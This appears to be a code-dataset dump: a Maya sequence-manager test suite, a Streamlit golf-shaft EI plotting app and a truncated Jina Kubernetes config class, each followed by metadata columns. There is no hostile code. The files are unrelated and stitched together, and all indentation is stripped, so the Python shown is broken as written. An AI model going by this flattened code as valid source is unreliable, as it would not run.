self.assertEqual(len(shots), 3)
shot1 = shots[0]
shot2 = shots[1]
shot3 = shots[2]
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1024, shot1.wResolution.get())
self.assertEqual(778, shot1.hResolution.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(34.0, shot1.sequenceEndFrame.get())
self.assertEqual(34.0, shot1.duration)
self.assertEqual(10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
self.assertEqual(
'/tmp/SEQ001_HSNI_003_0010_v001.mov',
shot1.output.get()
)
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1024, shot2.wResolution.get())
self.assertEqual(778, shot2.hResolution.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(35.0, shot2.sequenceStartFrame.get())
self.assertEqual(65.0, shot2.sequenceEndFrame.get())
self.assertEqual(31.0, shot2.duration)
self.assertEqual(10.0, shot2.startFrame.get())
self.assertEqual(40.0, shot2.endFrame.get())
self.assertEqual(
'/tmp/SEQ001_HSNI_003_0020_v001.mov',
shot2.output.get()
)
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1024, shot3.wResolution.get())
self.assertEqual(778, shot3.hResolution.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(66.0, shot3.sequenceStartFrame.get())
self.assertEqual(111.0, shot3.sequenceEndFrame.get())
self.assertEqual(46.0, shot3.duration)
self.assertEqual(10.0, shot3.startFrame.get())
self.assertEqual(55.0, shot3.endFrame.get())
self.assertEqual(
'/tmp/SEQ001_HSNI_003_0030_v001.mov',
shot3.output.get()
)
def test_from_xml_updates_sequencer_hierarchy_with_shots_expanded_and_contracted(self):
"""testing if from_xml method will update Sequences and shots
correctly with the xml file
"""
path = os.path.abspath('./test_data/test_v002.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_xml(path)
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(55.0, shot2.sequenceStartFrame.get())
self.assertEqual(75.0, shot2.sequenceEndFrame.get())
self.assertEqual(44.0, shot2.startFrame.get())
self.assertEqual(64.0, shot2.endFrame.get())
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(76.0, shot3.sequenceStartFrame.get())
self.assertEqual(131.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(120.0, shot3.endFrame.get())
def test_from_edl_updates_sequencer_hierarchy_with_shots_expanded_and_contracted(self):
"""testing if from_edl method will update Sequences and shots
correctly with the edl file
"""
path = os.path.abspath('./test_data/test_v002.edl')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_edl(path)
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(55.0, shot2.sequenceStartFrame.get())
self.assertEqual(76.0, shot2.sequenceEndFrame.get())
self.assertEqual(44.0, shot2.startFrame.get())
self.assertEqual(65.0, shot2.endFrame.get())
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(77.0, shot3.sequenceStartFrame.get())
self.assertEqual(133.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(121.0, shot3.endFrame.get())
def test_from_edl_updates_sequencer_hierarchy_with_shots_used_more_than_one_times(self):
"""testing if from_edl method will update Sequences and shots correctly
with shot are used more than once
"""
path = os.path.abspath('./test_data/test_v004.edl')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
# set a camera for shot4
shot3.set_camera('persp')
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_edl(path)
# check if there are 4 shots
self.assertEqual(4, len(seq.shots.get()))
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(55.0, shot2.sequenceStartFrame.get())
self.assertEqual(76.0, shot2.sequenceEndFrame.get())
self.assertEqual(44.0, shot2.startFrame.get())
self.assertEqual(65.0, shot2.endFrame.get())
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(77.0, shot3.sequenceStartFrame.get())
self.assertEqual(133.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(121.0, shot3.endFrame.get())
# Clip4
# there should be an extra shot
shot4 = seq.shots.get()[-1]
self.assertEqual('0030', shot4.shotName.get())
self.assertEqual(1, shot4.track.get())
self.assertEqual(133.0, shot4.sequenceStartFrame.get())
self.assertEqual(189.0, shot4.sequenceEndFrame.get())
self.assertEqual(65.0, shot4.startFrame.get())
self.assertEqual(121.0, shot4.endFrame.get())
# check if their cameras also the same
self.assertEqual(
shot3.get_camera(),
shot4.get_camera()
)
def test_from_xml_updates_sequencer_hierarchy_with_shots_removed(self):
"""testing if from_xml method will update Sequences and shots
correctly with the xml file
"""
path = os.path.abspath('./test_data/test_v003.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_xml(path)
# we should have 2 shots only
self.assertEqual(2, len(seq.shots.get()))
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
# removed
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(55.0, shot3.sequenceStartFrame.get())
self.assertEqual(110.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(120.0, shot3.endFrame.get())
def test_to_xml_will_generate_proper_xml_string(self):
"""testing if a proper xml compatible string will be generated with
to_xml() method
"""
path = os.path.abspath('./test_data/test_v001.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
sm.set_version('v001')
seq1 = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq1.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq1.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq1.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
result = sm.to_xml()
with open(path) as f:
expected = f.read()
self.maxDiff = None
self.assertEqual(expected, result)
def test_create_sequence_is_working_properly(self):
"""testing if create_sequence is working properly
"""
seq = self.sm.create_sequence()
self.assertEqual(seq.type(), 'sequencer')
self.maxDiff = None
self.assertEqual(self.sm, seq.message.connections()[0])
def test_create_sequence_is_properly_setting_the_sequence_name(self):
"""testing if create_sequence is working properly
"""
seq = self.sm.create_sequence('Test Sequence')
self.assertEqual(
'Test Sequence',
seq.sequence_name.get()
)
def test_to_edl_is_working_properly(self):
"""testing if to_edl method is working properly
"""
import edl
# create a sequence
seq1 = self.sm.create_sequence('sequence1')
seq1.create_shot('shot1')
seq1.create_shot('shot2')
seq1.create_shot('shot3')
l = self.sm.to_edl()
self.assertIsInstance(
l,
edl.List
)
def test_to_edl_will_generate_a_proper_edl_content(self):
"""testing if to_edl will generate a proper edl content
"""
edl_path = os.path.abspath('./test_data/test_v001.edl')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
sm.set_version('v001')
seq1 = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq1.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq1.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq1.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
l = sm.to_edl()
result = l.to_string()
with open(edl_path) as f:
expected_edl_content = f.read()
self.assertEqual(
expected_edl_content,
result
)
def test_generate_sequence_structure_returns_a_sequence_instance(self):
"""testing if generate_sequence_structure() method will return a
Sequence instance
"""
sm = pymel.core.PyNode('sequenceManager1')
seq1 = sm.create_sequence('sequence1')
shot1 = seq1.create_shot('shot1')
shot1.output.set('/tmp/shot1.mov')
shot2 = seq1.create_shot('shot2')
shot2.output.set('/tmp/shot2.mov')
result = sm.generate_sequence_structure()
self.assertIsInstance(
result,
Sequence
)
def test_generate_sequence_structure_will_generate_sequences_and_shots_with_correct_number_of_tracks(self):
"""testing if a proper sequence structure will be generated by using
the generate_sequence_structure() method with correct number of tracks
"""
path = os.path.abspath('./test_data/test_v001.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.from_xml(path)
seq1 = sm.sequences.get()[0]
shots = seq1.shots.get()
shot1 = shots[0]
shot2 = shots[1]
shot3 = shots[2]
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
seq = sm.generate_sequence_structure()
tracks = seq.media.video.tracks
self.assertEqual(len(tracks), 1)
track1 = tracks[0]
clips = track1.clips
self.assertEqual(len(clips), 3)
def test_set_shot_name_template_is_working_properly(self):
"""testing if set_shot_name_template() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('shot_name_template'))
test_template = '<Sequence>_<Shot>_<Version>'
sm.set_shot_name_template(test_template)
self.assertTrue(sm.hasAttr('shot_name_template'))
self.assertEqual(sm.shot_name_template.get(), test_template)
def test_get_shot_name_template_is_working_properly(self):
"""testing if set_shot_name_template() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('shot_name_template'))
test_template = '<Sequence>_<Shot>_<Version>'
sm.set_shot_name_template(test_template)
self.assertTrue(sm.hasAttr('shot_name_template'))
self.assertEqual(sm.get_shot_name_template(), test_template)
def test_get_shot_name_template_will_create_shot_name_template_attribute_if_missing(self):
"""testing if set_shot_name_template() will create the
shot_name_template attribute if missing
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('shot_name_template'))
result = sm.get_shot_name_template()
self.assertTrue(sm.hasAttr('shot_name_template'))
self.assertEqual(result, '<Sequence>_<Shot>_<Version>')
def test_set_version_is_working_properly(self):
"""testing if set_version() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('version'))
test_version = 'v001'
sm.set_version(test_version)
self.assertTrue(sm.hasAttr('version'))
self.assertEqual(sm.version.get(), test_version)
def test_get_version_is_working_properly(self):
"""testing if set_version() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('version'))
test_version = 'v001'
sm.set_version(test_version)
self.assertTrue(sm.hasAttr('version'))
self.assertEqual(sm.get_version(), test_version)
def test_get_version_will_create_attribute_if_missing(self):
"""testing if get_version() will create the missing version attribute
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('version'))
result = sm.get_version()
self.assertTrue(sm.hasAttr('version'))
self.assertEqual(result, '')
def test_set_task_name_is_working_properly(self):
"""testing if set_task_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('task_name'))
test_task_name = 'Animation'
sm.set_task_name(test_task_name)
self.assertTrue(sm.hasAttr('task_name'))
self.assertEqual(sm.task_name.get(), test_task_name)
def test_get_task_name_is_working_properly(self):
"""testing if set_task_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('task_name'))
test_task_name = 'Animation'
sm.set_task_name(test_task_name)
self.assertTrue(sm.hasAttr('task_name'))
self.assertEqual(sm.get_task_name(), test_task_name)
def test_get_task_name_will_create_attribute_if_missing(self):
"""testing if get_task_name() will create the missing task_name attribute
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('task_name'))
result = sm.get_task_name()
self.assertTrue(sm.hasAttr('task_name'))
self.assertEqual(result, '')
def test_set_take_name_is_working_properly(self):
"""testing if set_take_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('take_name'))
test_take_name = 'Main'
sm.set_take_name(test_take_name)
self.assertTrue(sm.hasAttr('take_name'))
self.assertEqual(sm.take_name.get(), test_take_name)
def test_get_take_name_is_working_properly(self):
"""testing if set_take_name() is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('take_name'))
test_take_name = 'Main'
sm.set_take_name(test_take_name)
self.assertTrue(sm.hasAttr('take_name'))
self.assertEqual(sm.get_take_name(), test_take_name)
def test_get_take_name_will_create_attribute_if_missing(self):
"""testing if get_take_name() will create the missing take_name attribute
"""
sm = pymel.core.PyNode('sequenceManager1')
self.assertFalse(sm.hasAttr('take_name'))
result = sm.get_take_name()
self.assertTrue(sm.hasAttr('take_name'))
self.assertEqual(result, '')
def test_generate_sequence_structure_is_working_properly(self):
"""testing if generate_sequence_structure() method is working properly
"""
sm = pymel.core.PyNode('sequenceManager1')
from anima.env import mayaEnv
mayaEnv.Maya.set_fps(fps=24)
sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
sm.set_version('v001')
seq1 = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq1.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(24)
shot1.sequenceStartFrame.set(0)
shot1.track.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot2 = seq1.create_shot('0020')
shot2.startFrame.set(10)
shot2.endFrame.set(35)
shot2.sequenceStartFrame.set(25)
shot2.track.set(1)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(15)
shot3 = seq1.create_shot('0030')
shot3.startFrame.set(25)
shot3.endFrame.set(50)
shot3.sequenceStartFrame.set(45)
shot3.track.set(2)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(20)
seq = sm.generate_sequence_structure()
self.assertIsInstance(seq, Sequence)
rate = seq.rate
self.assertEqual('24', rate.timebase)
self.assertEqual(False, rate.ntsc)
self.assertEqual('00:00:00:00', seq.timecode)
self.assertEqual(False, seq.ntsc)
media = seq.media
self.assertIsInstance(media, Media)
video = media.video
self.assertIsInstance(video, Video)
self.assertIsNone(media.audio)
self.assertEqual(2, len(video.tracks))
track1 = video.tracks[0]
self.assertIsInstance(track1, Track)
self.assertEqual(len(track1.clips), 2)
self.assertEqual(track1.enabled, True)
track2 = video.tracks[1]
self.assertIsInstance(track2, Track)
self.assertEqual(len(track2.clips), 1)
self.assertEqual(track2.enabled, True)
clip1 = track1.clips[0]
self.assertIsInstance(clip1, Clip)
self.assertEqual('Video', clip1.type)
self.assertEqual('SEQ001_HSNI_003_0010_v001', clip1.id)
self.assertEqual('SEQ001_HSNI_003_0010_v001', clip1.name)
self.assertEqual(10, clip1.in_) # handle
self.assertEqual(35, clip1.out) # handle + duration
self.assertEqual(0, clip1.start) # sequenceStartFrame
self.assertEqual(25, clip1.end) # sequenceEndFrame + 1
clip2 = track1.clips[1]
self.assertIsInstance(clip2, Clip)
self.assertEqual('Video', clip2.type)
self.assertEqual('SEQ001_HSNI_003_0020_v001', clip2.id)
self.assertEqual('SEQ001_HSNI_003_0020_v001', clip2.name)
self.assertEqual(15, clip2.in_) # handle
self.assertEqual(41, clip2.out) # handle + duration
self.assertEqual(25, clip2.start) # sequenceStartFrame
self.assertEqual(51, clip2.end) # sequenceEndFrame + 1
clip3 = track2.clips[0]
self.assertIsInstance(clip3, Clip)
self.assertEqual('Video', clip3.type)
self.assertEqual('SEQ001_HSNI_003_0030_v001', clip3.id)
self.assertEqual('SEQ001_HSNI_003_0030_v001', clip3.name)
self.assertEqual(20, clip3.in_) # startFrame
self.assertEqual(46, clip3.out) # endFrame + 1
self.assertEqual(45, clip3.start) # sequenceStartFrame
self.assertEqual(71, clip3.end) # sequenceEndFrame + 1
file1 = clip1.file
self.assertIsInstance(file1, File)
self.assertEqual('SEQ001_HSNI_003_0010_v001', file1.name)
self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0010_v001.mov',
file1.pathurl)
self.assertEqual(45, file1.duration) # including handles
file2 = clip2.file
self.assertIsInstance(file2, File)
self.assertEqual('SEQ001_HSNI_003_0020_v001', file2.name)
self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0020_v001.mov',
file2.pathurl)
self.assertEqual(56, file2.duration) # including handles
file3 = clip3.file
self.assertIsInstance(file3, File)
self.assertEqual('SEQ001_HSNI_003_0030_v001', file3.name)
self.assertEqual('file://localhost/tmp/SEQ001_HSNI_003_0030_v001.mov',
file3.pathurl)
self.assertEqual(66, file3.duration) # including handles
| tests/previs/test_sequence_manager_extension.py | 30,520 | tests the SequenceManagerExtension class
set up the test
testing if create_sequence is working properly
testing if create_sequence is working properly
testing if from_edl method will update Sequences and shots
correctly with the edl file
testing if from_edl method will update Sequences and shots correctly
with shot are used more than once
testing if from_xml method will generate Sequences and shots
correctly
testing if a TypeError will be raised when the path argument is not
a string
testing if a IOError will be raised when the path argument is not
a valid path
testing if a TypeError will be raised when the path argument is
skipped
testing if from_xml method will update Sequences and shots
correctly with the xml file
testing if from_xml method will update Sequences and shots
correctly with the xml file
testing if generate_sequence_structure() method is working properly
testing if generate_sequence_structure() method will return a
Sequence instance
testing if a proper sequence structure will be generated by using
the generate_sequence_structure() method with correct number of tracks
testing if set_shot_name_template() is working properly
testing if set_shot_name_template() will create the
shot_name_template attribute if missing
testing if set_take_name() is working properly
testing if get_take_name() will create the missing take_name attribute
testing if set_task_name() is working properly
testing if get_task_name() will create the missing task_name attribute
testing if set_version() is working properly
testing if get_version() will create the missing version attribute
testing if set_shot_name_template() is working properly
testing if set_take_name() is working properly
testing if set_task_name() is working properly
testing if set_version() is working properly
testing if to_edl method is working properly
testing if to_edl will generate a proper edl content
testing if a proper xml compatible string will be generated with
to_xml() method
-*- coding: utf-8 -*- prepare for test to setup maya extensions create a new scene and get the sequenceManager in the scene check scene fps check timecode Clip2 Clip3 now update it with test_v002.xml check shot data Clip2 Clip3 now update it with test_v002.xml check shot data Clip2 Clip3 set a camera for shot4 now update it with test_v002.xml check if there are 4 shots check shot data Clip2 Clip3 Clip4 there should be an extra shot check if their cameras also the same now update it with test_v002.xml we should have 2 shots only check shot data Clip2 removed Clip3 create a sequence handle handle + duration sequenceStartFrame sequenceEndFrame + 1 handle handle + duration sequenceStartFrame sequenceEndFrame + 1 startFrame endFrame + 1 sequenceStartFrame sequenceEndFrame + 1 including handles including handles including handles | 2,964 | en | 0.693469 |
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
##python3 script created by tBarford on 20220205
##
##
##File Description: This is the streamlit webapp MVP for BG Golf EI Profile Database Demo
## run in term w/ : streamlit run streamlit_app.py
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##
import streamlit as st
import firestoreservice as fs
from matplotlib import pyplot as plt
import PIL as img
def main():
firestore = fs.FirestoreService()
## Sidebar
with st.sidebar:
st.subheader('Shaft Selection Tools:')
shaftType = st.selectbox('Type of shaft:', options = ['iron', 'wood'], key = 'type')
shaft = st.selectbox('Choose a shaft to display:', options = firestore.getShaftList(shaftType), key = 'shaft')
stiffness = st.selectbox('Choose a stiffness:', options = firestore.getStiffness(shaftType, shaft), key = 'stiff')
compare = st.radio('Compare another shaft?', options = ['No', 'Yes'])
if compare == 'Yes':
shaftType_compare = st.selectbox('Type of shaft:', options = ['iron', 'wood'], key = 'type2')
shaft_compare = st.selectbox('Choose a shaft to display:', options = firestore.getShaftList(shaftType_compare), key = 'shaft2')
stiffness_compare = st.selectbox('Choose a stiffness:', options = firestore.getStiffness(shaftType_compare, shaft_compare), key = 'stiff2')
else:
shaftType_compare, shaft_compare, stiffness_compare = None, None, None
## Main Content
st.image(img.Image.open('./assets/bg_logo_horz.png'), use_column_width=True)
st.header('Shaft Profile Demo')
#manage shafts to plot
if stiffness is not None:
dataToPlot = {f'{shaft} {stiffness}':firestore.getEI(shaftType, shaft, stiffness)}
if stiffness_compare is not None:
dataToPlot[f'{shaft_compare} {stiffness_compare}'] = firestore.getEI(shaftType_compare, shaft_compare, stiffness_compare)
if st.button('Update Plot'):
fig, ax = plt.subplots()
for each in dataToPlot.keys():
ax.plot(dataToPlot[each][0], dataToPlot[each][1], label = each)
ax.set(xlabel='Length From Tip (in.)', ylabel='EI',
title='BG Measured EI Curve')
ax.grid()
ax.legend()
st.pyplot(fig)
if __name__ == '__main__':
main() | streamlit_app.py | 2,395 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~python3 script created by tBarford on 20220205File Description: This is the streamlit webapp MVP for BG Golf EI Profile Database Demo run in term w/ : streamlit run streamlit_app.py~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sidebar Main Contentmanage shafts to plot | 310 | en | 0.492047 |
import copy
from argparse import Namespace
from typing import Dict, Union, List, Optional, Tuple
from jina import __default_executor__
from jina.enums import PodRoleType
from jina.excepts import NoContainerizedError
from jina.orchestrate.deployments.config.k8slib import kubernetes_deployment
from jina.orchestrate.deployments.config.helper import (
get_image_name,
to_compatible_name,
get_base_executor_version,
construct_runtime_container_args,
validate_uses,
)
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.deployments import BaseDeployment
class K8sDeploymentConfig:
"""
Class that implements the output of configuration files for Kubernetes for a given Deployment.
"""
class _K8sDeployment:
def __init__(
self,
name: str,
version: str,
pod_type: PodRoleType,
jina_deployment_name: str,
shard_id: Optional[int],
common_args: Union['Namespace', Dict],
deployment_args: Union['Namespace', Dict],
k8s_namespace: str,
k8s_connection_pool: bool = True,
k8s_deployments_addresses: Optional[Dict[str, List[str]]] = None,
):
self.name = name
self.dns_name = to_compatible_name(name)
self.version = version
self.pod_type = pod_type
self.jina_deployment_name = jina_deployment_name
self.shard_id = shard_id
self.common_args = common_args
self.deployment_args = deployment_args
self.num_replicas = getattr(self.deployment_args, 'replicas', 1)
self.k8s_namespace = k8s_namespace
self.k8s_connection_pool = k8s_connection_pool
self.k8s_deployments_addresses = k8s_deployments_addresses
def get_gateway_yamls(
self,
) -> List[Dict]:
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-standard'
)
cargs = copy.copy(self.deployment_args)
cargs.env = None
cargs.deployments_addresses = self.k8s_deployments_addresses
from jina.helper import ArgNamespace
from jina.parsers import set_gateway_parser
taboo = {
'uses_with',
'uses_metas',
'volumes',
'uses_before',
'uses_after',
'workspace',
'workspace_id',
'upload_files',
'noblock_on_start',
}
non_defaults = ArgNamespace.get_non_defaults_args(
cargs, set_gateway_parser(), taboo=taboo
)
_args = ArgNamespace.kwargs2list(non_defaults)
container_args = ['gateway'] + _args
if not cargs.k8s_connection_pool:
container_args.append('--k8s-disable-connection-pool')
return kubernetes_deployment.get_deployment_yamls(
self.dns_name,
namespace=self.k8s_namespace,
image_name=image_name,
container_cmd='["jina"]',
container_args=f'{container_args}',
replicas=1,
pull_policy='IfNotPresent',
jina_deployment_name='gateway',
pod_type=self.pod_type,
port=self.common_args.port,
env=cargs.env,
)
def _get_image_name(self, uses: Optional[str]):
import os
test_pip = os.getenv('JINA_K8S_USE_TEST_PIP') is not None
image_name = (
'jinaai/jina:test-pip'
if test_pip
else f'jinaai/jina:{self.version}-py38-perf'
)
if uses is not None and uses != __default_executor__:
image_name = get_image_name(uses)
return image_name
def _get_container_args(self, cargs, pod_type):
uses_metas = cargs.uses_metas or {}
uses_with = self.deployment_args.uses_with
